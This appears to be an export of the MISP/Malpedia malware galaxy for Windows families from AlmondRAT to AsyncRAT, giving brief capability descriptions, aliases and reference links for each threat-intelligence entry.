AlmondRAT is a .NET Remote Access Trojan deployed by the Bitter APT group. It is capable of collecting system information, modifying and exfiltrating data and allows for remote command execution.

The tag is: misp-galaxy:malpedia="AlmondRAT"

AlmondRAT is also known as:

Table 2869. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.almondrat

https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/

ALPC Local PrivEsc

The tag is: misp-galaxy:malpedia="ALPC Local PrivEsc"

ALPC Local PrivEsc is also known as:

Table 2870. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe

https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/

Alphabet Ransomware

The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not yet finished, it does not affect any user files.

The virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.

The tag is: misp-galaxy:malpedia="Alphabet Ransomware"

Alphabet Ransomware is also known as:

Table 2871. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware

https://twitter.com/JaromirHorejsi/status/813714602466877440

AlphaLocker

AlphaLocker is a new form of ransomware that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.

AlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware’s author is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines and evade detection.

AlphaLocker’s encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user’s computer and saving the private key on the server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, then encrypts this key with the public RSA key and sends the result to the C&C server.

To decrypt their files, users have to obtain the private RSA key, which is needed to recover the per-file AES keys and thus decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.

The tag is: misp-galaxy:malpedia="AlphaLocker"

AlphaLocker is also known as:

Table 2872. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker

https://blog.cylance.com/an-introduction-to-alphalocker

Alreay

Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.

It uses either RC4 or DES for encryption of its configuration, which is stored in the registry.

It sends detailed information about the victim’s environment, like computer name, Windows version, system locale, and network configuration.

It supports almost 25 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.

It comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).

Alreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.

The tag is: misp-galaxy:malpedia="Alreay"

Alreay is also known as:

Table 2875. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay

https://securelist.com/lazarus-under-the-hood/77908/

https://securelist.com/blog/sas/77908/lazarus-under-the-hood/

Amadey

Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.

The tag is: misp-galaxy:malpedia="Amadey"

Amadey is also known as:

Table 2877. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become

https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://asec.ahnlab.com/en/36634/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_string_decryptor.py

https://embee-research.ghost.io/amadey-bot-infrastructure/

https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/

https://asec.ahnlab.com/en/44504/

https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html

https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html

https://embee-research.ghost.io/shodan-censys-queries/

https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://thecyberexpress.com/amadey-botnet-back-via-phishing-sites/

https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.zscaler.com/blogs/security-research/latest-version-amadey-introduces-screen-capturing-and-pushes-remcos-rat

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-amadey-56c8c6ea0ad6

https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/

https://nao-sec.org/2019/04/Analyzing-amadey.html

https://twitter.com/ViriBack/status/1062405363457118210

https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/

https://twitter.com/0xffff0800/status/1062948406266642432

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.anquanke.com/post/id/230116

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://asec.ahnlab.com/en/41450/

https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot

https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey

https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/

https://isc.sans.edu/diary/27264

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_config_extractor.ipynb

Anatova Ransomware

Anatova is a ransomware family with the goal of ciphering all the files that it can and then requesting payment from the victim. It will also check if network shares are connected and will encrypt the files on these shares too. The code is also prepared to support modular extensions.

The tag is: misp-galaxy:malpedia="Anatova Ransomware"

Anatova Ransomware is also known as:

Table 2879. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom

https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/

Anchor

Anchor is a sophisticated backdoor served as a module to a subset of TrickBot installations. Operating since August 2018, it is not delivered to every infected host; on the contrary, it is delivered only to high-profile targets. Since its C2 communication scheme is very similar to the one implemented in early TrickBot, multiple experts believe it could be attributed to the same authors.

The tag is: misp-galaxy:malpedia="Anchor"

Anchor is also known as:

Table 2880. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/

https://www.netscout.com/blog/asert/dropping-anchor

https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf

https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/

https://unit42.paloaltonetworks.com/ryuk-ransomware/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/

https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth

https://isc.sans.edu/diary/27308

https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns

AnchorMTea

Recon/Loader malware attributed to Lazarus, disguised as a Notepad++ shell extension.

The tag is: misp-galaxy:malpedia="AnchorMTea"

AnchorMTea is also known as:

Table 2882. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea

https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

http://report.threatbook.cn/LS.pdf

Andardoor

The tag is: misp-galaxy:malpedia="Andardoor"

Andardoor is also known as:

  • ROCKHATCH

Table 2883. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor

https://asec.ahnlab.com/ko/47751/

https://asec.ahnlab.com/en/56405/

https://asec.ahnlab.com/ko/56256/

Andromeda

The tag is: misp-galaxy:malpedia="Andromeda"

Andromeda is also known as:

  • B106-Gamarue

  • B67-SS-Gamarue

  • Gamarue

  • b66

Table 2884. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://redcanary.com/blog/intelligence-insights-november-2021/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features

http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/

https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html

https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

http://blog.morphisec.com/andromeda-tactics-analyzed

http://resources.infosecinstitute.com/andromeda-bot-analysis/

https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/

https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html

http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/

https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis

https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/

https://eternal-todo.com/blog/andromeda-gamarue-loves-json

https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/

https://blog.avast.com/andromeda-under-the-microscope

AndroMut

According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The “Andro” part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1], and “Mut” is based on a mutex that the analyzed sample creates: “mutshellmy777”.

The tag is: misp-galaxy:malpedia="AndroMut"

AndroMut is also known as:

  • Gelup

Table 2885. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf

https://intel471.com/blog/a-brief-history-of-ta505

AnteFrigus

Ransomware that demands payment in Bitcoin.

The tag is: misp-galaxy:malpedia="AnteFrigus"

AnteFrigus is also known as:

Table 2887. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.antefrigus

https://github.com/albertzsigovits/malware-notes/blob/master/Antefrigus.md

http://id-ransomware.blogspot.com/2019/11/antefrigus-ransomware.html

Antilam

The tag is: misp-galaxy:malpedia="Antilam"

Antilam is also known as:

  • Latinus

Table 2888. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam

Anubis (Windows)

According to Microsoft Security Intelligence, Anubis is an information stealer sold on underground forums since June 2020. The name overlaps with the Android banking malware but is unrelated. It contains code forked from Loki PWS.

The tag is: misp-galaxy:malpedia="Anubis (Windows)"

Anubis (Windows) is also known as:

  • Anubis Stealer

Table 2889. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis

https://twitter.com/MsftSecIntel/status/1298752223321546754

https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/

APERETIF

The tag is: misp-galaxy:malpedia="APERETIF"

APERETIF is also known as:

Table 2891. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif

https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/

Apocalipto

The tag is: misp-galaxy:malpedia="Apocalipto"

Apocalipto is also known as:

Table 2892. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto

https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf

Apollo

This is an implant usable with the Mythic C2 framework. Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed to be used in SpecterOps training offerings.

The tag is: misp-galaxy:malpedia="Apollo"

Apollo is also known as:

Table 2894. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.apollo

https://github.com/MythicAgents/Apollo

Appleseed

The tag is: misp-galaxy:malpedia="Appleseed"

Appleseed is also known as:

  • JamBog

Table 2897. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed

https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf

https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf

https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf

https://asec.ahnlab.com/ko/26705/

https://asec.ahnlab.com/en/36368/

https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf

https://www.youtube.com/watch?v=Dv2_DK3tRgI

https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

https://asec.ahnlab.com/en/41015/

https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf

https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf

https://asec.ahnlab.com/ko/54804/

https://asec.ahnlab.com/en/60054/

https://www.youtube.com/watch?v=rfzmHjZX70s

https://www.telsy.com/download/5654/?uid=4869868efd

https://asec.ahnlab.com/ko/36918/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf

https://asec.ahnlab.com/en/30532/

ArdaMax

According to F-Secure, Ardamax is a commercial keylogger program that can be installed onto the system from the product’s website. When run, the program can capture a range of user activities, such as keystrokes typed, instant messenger chat logs, web browser activity and even screenshots of the active desktop.

This program can be configured to a complete stealth mode, with password protection, to avoid user detection.

The information gathered is stored in an encrypted log file, which is only viewable using the built-in Log Viewer. The log file can be sent to an external party through e-mail, via a local area network (LAN) or by upload to an FTP server (in either HTML or encrypted format).

The tag is: misp-galaxy:malpedia="ArdaMax"

ArdaMax is also known as:

Table 2898. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576

Ares (Windows)

A banking trojan, derived from the source code of win.kronos. In August 2022 it started to incorporate DGA code from win.qakbot.

The tag is: misp-galaxy:malpedia="Ares (Windows)"

Ares (Windows) is also known as:

Table 2900. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ares

https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan

https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga

AresLoader

AresLoader is a new malware "downloader" that has been advertised on the Russian-language Dark Web forums "RAMP" and "XSS" by a threat actor called "DarkBLUP". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because a similar project, dubbed "Project Ares", was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer "CerberSec".

The loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:

  1. Written in C/C++

  2. Supports 64-bit payloads

  3. Makes it look like malware spawned by another process

  4. Prevents non-Microsoft signed binaries from being injected into malware

  5. Hides suspicious imported Windows APIs

  6. Leverages anti-analysis techniques to avoid reverse engineering

Furthermore, it was observed that SystemBC, Amadey, and several Raccoon Stealer infections were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.

The tag is: misp-galaxy:malpedia="AresLoader"

AresLoader is also known as:

Table 2901. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader

https://flashpoint.io/blog/private-malware-for-sale-aresloader/

https://research.openanalysis.net/ares/aresloader/loader/2023/04/02/aresloader.html

https://www.zerofox.com/blog/the-underground-economist-volume-2-issue-24/

https://twitter.com/k3dg3/status/1636873721200746496

https://intel471.com/blog/new-loader-on-the-bloc-aresloader

ArguePatch

During a campaign against a Ukrainian energy provider, ESET researchers observed a new loader, called "ArguePatch", for a new version of CaddyWiper. ArguePatch is a modified version of Hex-Rays’ Remote Debugger Server (win32_remote.exe). ArguePatch expects a decryption key and the file containing the CaddyWiper shellcode as command line parameters.

The tag is: misp-galaxy:malpedia="ArguePatch"

ArguePatch is also known as:

Table 2902. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.arguepatch

https://www.mandiant.com/resources/blog/gru-rise-telegram-minions

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

Arid Gopher

This malware is a variant of Micropsia written in Go; according to Deep Instinct it is still in development.

The tag is: misp-galaxy:malpedia="Arid Gopher"

Arid Gopher is also known as:

Table 2904. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aridgopher

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks

https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant

https://www.theregister.com/2022/03/22/arid-gopher-malware-deep-instinct/

AridHelper

Helper malware associated with Arid Gopher, which provides an alternative persistence mechanism in case "360 Total Security" is found on a target system.

The tag is: misp-galaxy:malpedia="AridHelper"

AridHelper is also known as:

Table 2905. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aridhelper

https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant

Arik Keylogger

The tag is: misp-galaxy:malpedia="Arik Keylogger"

Arik Keylogger is also known as:

  • Aaron Keylogger

Table 2906. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger

http://remote-keylogger.net/

ArrowRAT

It is available as a service, purchasable by anyone to use in their own campaigns. Its features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module, which gives an attacker full remote access to the desktop with minimal technical knowledge required to use it.

The tag is: misp-galaxy:malpedia="ArrowRAT"

ArrowRAT is also known as:

Table 2908. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat

https://www.arrowrat.com

ARS VBS Loader

ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which in turn seems to be based on SafeLoader.

The tag is: misp-galaxy:malpedia="ARS VBS Loader"

ARS VBS Loader is also known as:

Table 2909. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader

https://twitter.com/Racco42/status/1001374490339790849

https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/

https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/

Asbit

The tag is: misp-galaxy:malpedia="Asbit"

Asbit is also known as:

Table 2912. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.asbit

https://blogs.juniper.net/en-us/threat-research/asbit-an-emerging-remote-desktop-trojan

AscentLoader

The tag is: misp-galaxy:malpedia="AscentLoader"

AscentLoader is also known as:

Table 2913. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader

ASPC

The tag is: misp-galaxy:malpedia="ASPC"

ASPC is also known as:

Table 2914. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc

Astaroth

First spotted in the wild in 2017, Astaroth is a highly prevalent, information-stealing Latin American banking trojan. It is written in Delphi and has some innovative execution and attack techniques. Originally, this malware variant targeted Brazilian users, but Astaroth now targets users both in North America and Europe.

The tag is: misp-galaxy:malpedia="Astaroth"

Astaroth is also known as:

  • Guildma

Table 2917. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/

https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/

https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/

https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/

https://blog.easysol.net/meet-lucifer-international-trojan/

https://isc.sans.edu/diary/27482

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/

https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt

https://blog.talosintelligence.com/2020/05/astaroth-analysis.html

https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf

Astasia

Astasia is a banking trojan that spreads through phishing emails that contain an executable attachment. Once the attachment is executed, Astasia downloads and installs a trojan that runs in the background. The trojan can steal personal information, such as passwords and credit card numbers, from victims.

The tag is: misp-galaxy:malpedia="Astasia"

Astasia is also known as:

Table 2918. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.astasia

https://twitter.com/MalGamy12/status/1690100567756906497

AsyncRAT

AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as keylogging, remote desktop control, and many other functions that may cause harm to the victim’s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.

The tag is: misp-galaxy:malpedia="AsyncRAT"

AsyncRAT is also known as:

Table 2920. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

https://www.secureworks.com/research/darktortilla-malware-analysis

https://twitter.com/MsftSecIntel/status/1392219299696152578

https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html

https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html

https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://medium.com/@hcksyd/asyncrat-analysing-the-three-stages-of-execution-378b343216bf

https://community.riskiq.com/article/3929ede0/description

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies

https://labs.k7computing.com/?p=21759

https://mssplab.github.io/threat-hunting/2023/05/19/malware-src-asyncrat.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://community.riskiq.com/article/ade260c6

https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign

https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf

https://twitter.com/vxunderground/status/1519632014361640960

https://blog.netlab.360.com/purecrypter

https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html

https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://threatpost.com/ta2541-apt-rats-aviation/178422/

https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/

https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia

https://community.riskiq.com/article/24759ad2

https://embee-research.ghost.io/shodan-censys-queries/

https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

